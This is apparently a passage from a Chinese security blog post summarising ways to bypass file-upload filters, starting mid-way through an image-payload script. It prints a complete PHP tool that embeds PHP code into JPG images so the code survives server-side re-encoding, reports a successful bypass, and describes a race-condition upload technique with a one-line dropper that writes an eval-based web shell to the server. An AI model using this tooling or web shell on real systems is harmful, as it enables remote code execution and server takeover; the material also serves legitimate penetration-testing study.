class="variable">$y</span> / <span class="number">3</span>), <span class="number">0</span>, <span class="variable">$color</span>);</span><br><span 
class="line"></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">imagepng</span>(<span class="variable">$img</span>,<span class="string">'./aba.png'</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></li></ul><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220623470.png" alt="image-20220717220623470"></p><p> 生成一张黑乎乎的图片<img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220549961.png" alt="image-20220717220549961"></p><p> 带有特定的php代码(不知道怎么改):</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717220711079.png" alt="image-20220717220711079"></p><p> jpg</p><p> jpg也是利用脚本处理</p><p> 由于jpg图片易损,对图片的选取有很大关系,很容易制作失败,需要多选取几张图片进行生成。</p><p> 可以写入phpinfo,不知道为什么一句话木马写进去制作时报错,好像是和引号有关</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span 
class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span 
class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span 
class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span 
class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span 
class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> It is necessary that the size and quality of the initial image are the same as those of the processed image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 1) Upload an arbitrary image via secured files upload script</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 2) Save the processed image and launch:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> jpg_payload.php <jpg_name.jpg></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span 
class="comment"> In case of successful injection you will get a specially crafted image, which should be uploaded again.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> Since the most straightforward injection method is used, the following problems can occur:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 1) After the second processing the injected data may become partially corrupted.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> 2) The jpg_payload.php script outputs "Something's wrong".</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> Sergey Bobrov <span class="doctag">@Black</span>2Fan.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> See also:</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"> https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span 
class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> = <span class="string">"<?=phpinfo();?>"</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">//payload,add=</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">extension_loaded</span>(<span class="string">'gd'</span>) || !<span class="title function_ invoke__">function_exists</span>(<span class="string">'imagecreatefromjpeg'</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'php-gd is not installed'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$argv</span>[<span class="number">1</span>])) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'php jpg_payload.php <jpg_name.jpg>'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">set_error_handler</span>(<span class="string">"custom_error_handler"</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">for</span>(<span class="variable">$pad</span> = <span class="number">0</span>; <span class="variable">$pad</span> < <span 
class="number">1024</span>; <span class="variable">$pad</span>++) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$nullbytePayloadSize</span> = <span class="variable">$pad</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$dis</span> = <span class="keyword">new</span> <span class="title class_">DataInputStream</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStream</span> = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$extraBytes</span> = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>-><span class="title function_ invoke__">readShort</span>() != <span class="number">0xFFD8</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Incorrect SOI marker'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>((!<span class="variable">$dis</span>-><span class="title function_ invoke__">eof</span>()) && (<span class="variable">$dis</span>-><span class="title function_ invoke__">readByte</span>() == <span class="number">0xFF</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$marker</span> = <span class="variable">$dis</span>-><span 
class="title function_ invoke__">readByte</span>();</span><br><span class="line"></span><br><span class="line"> <span class="variable">$size</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">readShort</span>() - <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$dis</span>-><span class="title function_ invoke__">skip</span>(<span class="variable">$size</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$marker</span> === <span class="number">0xDA</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$startPos</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">seek</span>();</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStreamTmp</span> = </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">str_repeat</span>(<span class="string">"\0"</span>,<span class="variable">$nullbytePayloadSize</span>) . 
</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>);</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">checkImage</span>(<span class="string">'_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStreamTmp</span>, <span class="literal">TRUE</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$extraBytes</span> !== <span class="number">0</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>((!<span class="variable">$dis</span>-><span class="title function_ invoke__">eof</span>())) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>-><span class="title function_ invoke__">readByte</span>() === <span class="number">0xFF</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$dis</span>->readByte !== <span class="number">0x00</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$stopPos</span> = <span class="variable">$dis</span>-><span class="title function_ invoke__">seek</span>() - <span class="number">2</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$imageStreamSize</span> = <span class="variable">$stopPos</span> - <span class="variable">$startPos</span>;</span><br><span class="line"></span><br><span 
class="line"> <span class="variable">$outStream</span> = </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="number">0</span>, <span class="variable">$startPos</span>) . </span><br><span class="line"></span><br><span class="line"> <span class="variable">$miniPayload</span> . </span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">str_repeat</span>(<span class="string">"\0"</span>,<span class="variable">$nullbytePayloadSize</span>).</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$startPos</span>, <span class="variable">$imageStreamSize</span>),</span><br><span class="line"></span><br><span class="line"> <span class="number">0</span>,</span><br><span class="line"></span><br><span class="line"> <span class="variable">$nullbytePayloadSize</span>+<span class="variable">$imageStreamSize</span>-<span class="variable">$extraBytes</span>) . 
</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">substr</span>(<span class="variable">$outStream</span>, <span class="variable">$stopPos</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">elseif</span>(<span class="variable">$correctImage</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$outStream</span> = <span class="variable">$outStreamTmp</span>;</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">checkImage</span>(<span class="string">'payload_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>], <span class="variable">$outStream</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Success!'</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="string">'payload_'</span>.<span class="variable">$argv</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'Something\'s 
wrong'</span>);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">checkImage</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$data</span>, <span class="variable">$unlink</span> = <span class="literal">FALSE</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">file_put_contents</span>(<span class="variable">$filename</span>, <span class="variable">$data</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">TRUE</span>;</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">imagecreatefromjpeg</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable">$unlink</span>)</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">unlink</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">custom_error_handler</span>(<span class="params"><span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="variable">$errfile</span>, <span class="variable">$errline</span></span>) 
</span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">global</span> <span class="variable">$extraBytes</span>, <span class="variable">$correctImage</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable">$correctImage</span> = <span class="literal">FALSE</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">'/(**\d**+) extraneous bytes before marker/'</span>, <span class="variable">$errstr</span>, <span class="variable">$m</span>)) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$m</span>[<span class="number">1</span>])) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$extraBytes</span> = (<span class="keyword">int</span>)<span class="variable">$m</span>[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">DataInputStream</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$binData</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$order</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$size</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span 
class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$filename</span>, <span class="variable">$order</span> = <span class="literal">false</span>, <span class="variable">$fromString</span> = <span class="literal">false</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="string">''</span>;</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->order = <span class="variable">$order</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="variable">$fromString</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(!<span class="title function_ invoke__">file_exists</span>(<span class="variable">$filename</span>) || !<span class="title function_ invoke__">is_file</span>(<span class="variable">$filename</span>))</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'File not exists ['</span>.<span class="variable">$filename</span>.<span class="string">']'</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">file_get_contents</span>(<span class="variable">$filename</span>);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="variable">$filename</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->size = <span class="title function_ 
invoke__">strlen</span>(<span class="variable">$this</span>->binData);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">seek</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> (<span class="variable language_">$this</span>->size - <span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData));</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">skip</span>(<span class="params"><span class="variable">$skip</span></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="variable">$skip</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readByte</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">$this</span>-><span class="title function_ invoke__">eof</span>()) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'End Of 
File'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$byte</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">0</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="title function_ invoke__">ord</span>(<span class="variable">$byte</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">readShort</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData) < <span class="number">2</span>) {</span><br><span class="line"></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'End Of File'</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = <span class="title function_ invoke__">substr</span>(<span class="variable">$this</span>->binData, <span class="number">0</span>, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line"> <span class="variable language_">$this</span>->binData = <span class="title function_ invoke__">substr</span>(<span 
class="variable">$this</span>->binData, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span>(<span class="variable language_">$this</span>->order) {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]) << <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]);</span><br><span class="line"></span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"></span><br><span class="line"> <span class="variable">$short</span> = (<span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">0</span>]) << <span class="number">8</span>) + <span class="title function_ invoke__">ord</span>(<span class="variable">$short</span>[<span class="number">1</span>]);</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="variable">$short</span>;</span><br><span class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">eof</span>(<span class="params"></span>) </span>{</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> !<span class="variable language_">$this</span>->binData||(<span class="title function_ invoke__">strlen</span>(<span class="variable">$this</span>->binData) === <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> }</span><br><span 
class="line"></span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717221745725.png" alt="image-20220717221745725"></p><p>Bypass successful</p><p><img src="/2022/07/18/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/image-20220717222127137.png" alt="image-20220717222127137"></p><h3 id="三,条件竞争"><a href="#三,条件竞争" class="headerlink" title="三,条件竞争"></a>3. Race conditions</h3><p>About race conditions</p><p>What is a race-condition upload? A race-condition upload is a server-side vulnerability caused by flawed operation logic in the back-end program. Because the server handles requests from different users concurrently, improper concurrency handling or a badly designed order of the related operations leads to this kind of problem. The vulnerability generally occurs where multiple threads access the same shared code, variable, file, etc. at the same time without any locking or synchronization.</p><p>In other words, we successfully upload the PHP file, but the back end deletes it within a short time, so we have to win the race and access the file before it is deleted; just as trying to delete a file while it is open prompts that the file is already open, this prevents the file from being deleted.</p><p>A brief description of the Burp approach: send the request to Intruder. No payload is needed to solve this one; simply keep uploading while continuously requesting the file.</p><p>If the file is saved before it is validated, we can upload PHP directly; if it is validated first, the validation needs to be bypassed.</p><p>In practice, an AntSword connection can be obtained through the race condition, but it is extremely unstable and disconnects easily. <del>I think this method is better suited to exposing some non-one-off key information</del></p><p>Being able to reach the file at all is the main problem. Since PHP can be written, once the file is reached it creates a shell file in a specified directory, so the backdoor can be accessed afterwards to get a shell.</p><p>Similar code is as follows:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line"> fputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>');</span><br><span class="line"> ?></span><br></pre></td></tr></table></figure><p>Reference link: <a href="https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html">https://wooyun.js.org/drops/user.ini%E6%96%87%E4%BB%B6%E6%9E%84%E6%88%90%E7%9A%84PHP%E5%90%8E%E9%97%A8.html</a></p>]]></content>
